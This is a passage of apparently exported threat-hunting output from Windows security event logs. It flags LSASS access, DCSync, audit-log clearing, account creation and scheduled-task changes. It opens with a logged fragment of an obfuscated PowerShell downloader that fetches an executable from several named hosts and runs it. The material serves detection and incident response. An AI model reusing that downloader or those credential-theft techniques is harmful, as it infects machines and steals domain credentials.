'+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item" +ParameterBinding(New-Item): name="ItemType"; value="DIrectOry" +ParameterBinding(New-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\" + + + +",DESKTOP-RIPCLIP,Windows PowerShell +non-system accounts getting a handle to and accessing lsass,1583705494.340693,2020-03-09T02:11:34.340693+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4663," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +",MSEDGEWIN10,Security +non-system accounts getting a handle to and accessing lsass,1583705494.340584,2020-03-09T02:11:34.340584+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4656," + + + + + 4656 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314461 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + 00000000-0000-0000-0000-000000000000 + %%1537 + %%1538 + %%1539 + %%1540 + %%1541 + %%4480 + %%4481 + %%4482 + %%4483 + %%4484 + %%4485 + %%4486 + %%4487 + %%4488 + %%4489 + %%4490 + %%4491 + %%4492 + %%4493 + + - + 0x1f3fff + - + 0 + 0x1688 + C:\Windows\System32\cscript.exe + - + +",MSEDGEWIN10,Security +Audit log cleared,1556393475.355063,2019-04-27T23:31:15.355063+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 4987 + + + + + Security + IEWIN7 + + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + + +",IEWIN7,Security +Audit log cleared,1600198172.174941,2020-09-15T23:29:32.174941+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 768617 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x4c331 + + +",01566s-win16-ir.threebeesco.com,Security +Dcsync Attack detected,1557281451.611176,2019-05-08T06:10:51.611176+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," + + + + + 4662 + 0 + 0 + 14080 + 0 + 0x8020000000000000 + + + 202793 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + Administrator + insecurebank + 0x40c6511 + DS + %{19195a5b-6da0-11d0-afd3-00c04fd930c9} + %{c6faf700-bfe4-452a-a766-424f84c29583} + Object Access + 0x0 + %%7688 + + 0x100 + %%7688 + {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} + {19195a5b-6da0-11d0-afd3-00c04fd930c9} + + - + + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1557281451.580169,2019-05-08T06:10:51.580169+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," + + + + + 4662 + 0 + 0 + 14080 + 0 + 0x8020000000000000 + + + 202792 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + Administrator + insecurebank + 0x40c6511 + DS + %{19195a5b-6da0-11d0-afd3-00c04fd930c9} + %{c6faf700-bfe4-452a-a766-424f84c29583} + Object Access + 0x0 + %%7688 + + 0x100 + %%7688 + {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} + {19195a5b-6da0-11d0-afd3-00c04fd930c9} + + - + + +",DC1.insecurebank.local,Security +Audit log cleared,1600340264.254575,2020-09-17T14:57:44.254575+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 769792 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x4c331 + + +",01566s-win16-ir.threebeesco.com,Security +Dcsync Attack detected,1557281443.487217,2019-05-08T06:10:43.487217+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," + + + + + 4662 + 0 + 0 + 14080 + 0 + 0x8020000000000000 + + + 202791 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + Administrator + insecurebank + 0x40c6511 + DS + %{19195a5b-6da0-11d0-afd3-00c04fd930c9} + %{c6faf700-bfe4-452a-a766-424f84c29583} + Object Access + 0x0 + %%7688 + + 0x100 + %%7688 + {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} + {19195a5b-6da0-11d0-afd3-00c04fd930c9} + + - + + +",DC1.insecurebank.local,Security +Audit log cleared,1595449776.414827,2020-07-23T00:29:36.414827+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 887106 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x3a17a + + +",01566s-win16-ir.threebeesco.com,Security +Process running in Unusual location,1638898381.636384,2021-12-07T21:33:01.636384+04:00,,Threat,High,"User Name : ( MSEDGEWIN10$ ) with process : ( \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +",MSEDGEWIN10,Security +schedule task updated,1553518420.276615,2019-03-25T16:53:40.276615+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 198239223 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-20 + DC1$ + insecurebank + 0x3e4 + \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> + <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> + <Version>1.0</Version> + <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> + <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> + <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> + </RegistrationInfo> + <Triggers> + <CalendarTrigger> + <StartBoundary>2019-03-26T12:51:45Z</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="NetworkService"> + <UserId>S-1-5-20</UserId> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>false</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> + <Priority>7</Priority> + <RestartOnFailure> + <Interval>PT1M</Interval> + <Count>3</Count> + </RestartOnFailure> + </Settings> + <Actions Context="NetworkService"> + <ComHandler> + <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> + <Data><![CDATA[timer]]></Data> + </ComHandler> + </Actions> +</Task> + +",DC1.insecurebank.local,Security +Audit log cleared,1645007839.637236,2022-02-16T14:37:19.637236+04:00,,Audit,Critical,Audit log cleared by user ( jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 2988521 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1105 + jbrown + 3B + 0x1717b6 + + +",01566s-win16-ir.threebeesco.com,Security +User Created through management interface,1600248733.647851,2020-09-16T13:32:13.647851+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720," + + + + + 4720 + 0 + 0 + 13824 + 0 + 0x8020000000000000 + + + 769634 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + $ + 3B + S-1-5-21-308926384-506822093-3341789130-107104 + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + - + $ + %%1793 + - + %%1793 + %%1793 + %%1793 + %%1793 + %%1793 + %%1794 + %%1794 + 513 + - + 0x0 + 0x15 + + %%2080 + %%2082 + %%2084 + %%1792 + - + %%1793 + +",01566s-win16-ir.threebeesco.com,Security +User Created through management interface,1600248679.134161,2020-09-16T13:31:19.134161+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720," + + + + + 4720 + 0 + 0 + 13824 + 0 + 0x8020000000000000 + + + 769629 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + $ + 3B + S-1-5-21-308926384-506822093-3341789130-107103 + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + - + $ + %%1793 + - + %%1793 + %%1793 + %%1793 + %%1793 + %%1793 + %%1794 + %%1794 + 513 + - + 0x0 + 0x15 + + %%2080 + %%2082 + %%2084 + %%1792 + - + %%1793 + +",01566s-win16-ir.threebeesco.com,Security +schedule task updated,1553516620.16764,2019-03-25T16:23:40.167640+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 198238969 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-20 + DC1$ + insecurebank + 0x3e4 + \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> + <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> + <Version>1.0</Version> + <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> + <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> + <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> + </RegistrationInfo> + <Triggers> + <CalendarTrigger> + <StartBoundary>2019-03-26T12:21:45Z</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="NetworkService"> + <UserId>S-1-5-20</UserId> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>false</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> + <Priority>7</Priority> + <RestartOnFailure> + <Interval>PT1M</Interval> + <Count>3</Count> + </RestartOnFailure> + </Settings> + <Actions Context="NetworkService"> + <ComHandler> + <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> + <Data><![CDATA[timer]]></Data> + </ComHandler> + </Actions> +</Task> + +",DC1.insecurebank.local,Security +schedule task updated,1553514820.047682,2019-03-25T15:53:40.047682+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 198238774 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-20 + DC1$ + insecurebank + 0x3e4 + \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> + <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> + <Version>1.0</Version> + <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> + <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> + <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> + </RegistrationInfo> + <Triggers> + <CalendarTrigger> + <StartBoundary>2019-03-26T11:51:45Z</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="NetworkService"> + <UserId>S-1-5-20</UserId> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>false</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> + <Priority>7</Priority> + <RestartOnFailure> + <Interval>PT1M</Interval> + <Count>3</Count> + </RestartOnFailure> + </Settings> + <Actions Context="NetworkService"> + <ComHandler> + <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> + <Data><![CDATA[timer]]></Data> + </ComHandler> + </Actions> +</Task> + +",DC1.insecurebank.local,Security +schedule task updated,1553513019.936605,2019-03-25T15:23:39.936605+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 198238563 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-20 + DC1$ + insecurebank + 0x3e4 + \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> + <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> + <Version>1.0</Version> + <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> + <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> + <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> + </RegistrationInfo> + <Triggers> + <CalendarTrigger> + <StartBoundary>2019-03-26T11:21:44Z</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="NetworkService"> + <UserId>S-1-5-20</UserId> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>false</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> + <Priority>7</Priority> + <RestartOnFailure> + <Interval>PT1M</Interval> + <Count>3</Count> + </RestartOnFailure> + </Settings> + <Actions Context="NetworkService"> + <ComHandler> + <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> + <Data><![CDATA[timer]]></Data> + </ComHandler> + </Actions> +</Task> + +",DC1.insecurebank.local,Security +Audit log cleared,1600879816.697344,2020-09-23T20:50:16.697344+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 772605 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x7b186 + + +",01566s-win16-ir.threebeesco.com,Security +User added to local group,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-20 ) to local group ( Administrators ),4732," + + + + + 4732 + 0 + 0 + 13826 + 0 + 0x8020000000000000 + + + 191030 + + + + + Security + MSEDGEWIN10 + + + + + - + S-1-5-20 + Administrators + Builtin + S-1-5-32-544 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x27a10f + - + +",MSEDGEWIN10,Security +User added to local group,1569151399.251925,2019-09-22T15:23:19.251925+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-21-3461203602-4096304019-2269080069-501 ) to local group ( Administrators ),4732," + + + + + 4732 + 0 + 0 + 13826 + 0 + 0x8020000000000000 + + + 191029 + + + + + Security + MSEDGEWIN10 + + + + + - + S-1-5-21-3461203602-4096304019-2269080069-501 + Administrators + Builtin + S-1-5-32-544 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x27a10f + - + +",MSEDGEWIN10,Security +Dcsync Attack detected,1557284437.586173,2019-05-08T07:00:37.586173+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," + + + + + 4662 + 0 + 0 + 14080 + 0 + 0x8020000000000000 + + + 203056 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + Administrator + insecurebank + 0x418a6fb + DS + %{19195a5b-6da0-11d0-afd3-00c04fd930c9} + %{c6faf700-bfe4-452a-a766-424f84c29583} + Object Access + 0x0 + %%7688 + + 0x100 + %%7688 + {9923a32a-3607-11d2-b9be-0000f87a36b2} + {19195a5b-6da0-11d0-afd3-00c04fd930c9} + + - + + +",DC1.insecurebank.local,Security +Audit log cleared,1557284425.304206,2019-05-08T07:00:25.304206+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 203050 + + + + + Security + DC1.insecurebank.local + + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + administrator + insecurebank + 0x218b896 + + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242594 + + + + + Security + DC1.insecurebank.local + + + + + AF3067E0-BB6F-47C2-AA20-F3F458797F38 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI